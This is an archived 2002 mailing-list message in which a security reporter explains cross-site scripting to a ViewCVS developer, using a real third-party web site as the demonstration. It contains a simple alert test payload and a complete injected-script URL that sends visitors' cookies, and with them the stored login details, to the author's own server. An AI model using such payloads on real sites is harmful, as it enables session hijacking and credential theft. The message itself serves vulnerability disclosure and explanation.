savannah-hackers
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Savannah-hackers] Re: [ViewCVS-dev] Re: Cross-Site Scripting of CVS syt

From: office
Subject: [Savannah-hackers] Re: [ViewCVS-dev] Re: Cross-Site Scripting of CVS sytem
Date: Wed, 27 Mar 2002 23:31:40 +0900 
On Wed, 27 Mar 2002 04:30:35 -0800
Greg Stein <address@hidden> wrote:

> There is absolutely no call to be insulting.

I aporogize you, I'm soryy.

# But anyway, I am just a Internet user, so not be a hacker, 
# I hate to think about computer code.

> Yes. *YOU* can help.

I'm a Japanese, so English explanation is so hard to me.
Have you imagined how many many hours I spend to make a short English report to 
you?

> *However*, your code does not exhibit any of the typical characteristics of
> a C-SS problem.

If you go to Google (or any other search service without C-SS :P) and 
enter <script>alert("hello")</script> as key word, you know that 
the code in URL is typical character to explain about C-SS vulneable point.
To seach it, you need only some seconds.

> So what I'd be interested in, is a clarification on how javascript embedded
> within the URL can be used as an attack method on a victim.

Do you want to know malisious code?
I think it is not good sense.

Hmmm.

This demo need a Netscape Navigator 4.7*
(If the condition about path of CSS point and cookie's path is good, 
IE or other brower are affected, but at this example condition malicios code is 
valid only for NN4.7*.

Go to 
http://www.kent-web.com/pwd/gatex/gatex.cgi
This is demo page of a perl script about secret room by kent-web.

Enter guest as UserID, and enter guest as password.
Check the check box to set cookie for automatic entering ID&pass as next login.
And push the botton, so you can enter the secret room (of demo).

By the way the seach system of ket-web, there is CSS.
You can see the CSS by
http://www.kent-web.com/cgi/wfinder.cgi?word=";><script>alert("hello")</script>
This is same code what I report you about ViewCVS.

And now, I show you malicios code.
Accsess to the URL
http://www.kent-web.com/pwd/gatex/../../cgi/wfinder.cgi?word=";><script>document.location%3D'http://www.office.ac/j.cgi?'%2Bdocument.cookie;</script>&view=10

May be you are kicked to the page on http://www.office.ac/j.cgi
and you can see your ID and Password about kent-web's secret room, ON MY SITE.
Yes, I (or my site) could steal your cookie with that code.

This malicious demo was already reported to kent-web by me.
So it may be fixed quickly.
Hurry up, if you want to see malicios code runnning actually.

That's all.
No more explanation is possible for me.
This very very very hard work give something to me?
I'm very tired...... almost to die.

You can read my reports about CSS on
http://www.office.ac/
Some reports arewrriten by my strange English.
If you can read Japanese, more.

Bye....

--
office
address@hidden
http://www.office.ac/
reply via email to
[Prev in Thread] Current Thread [Next in Thread]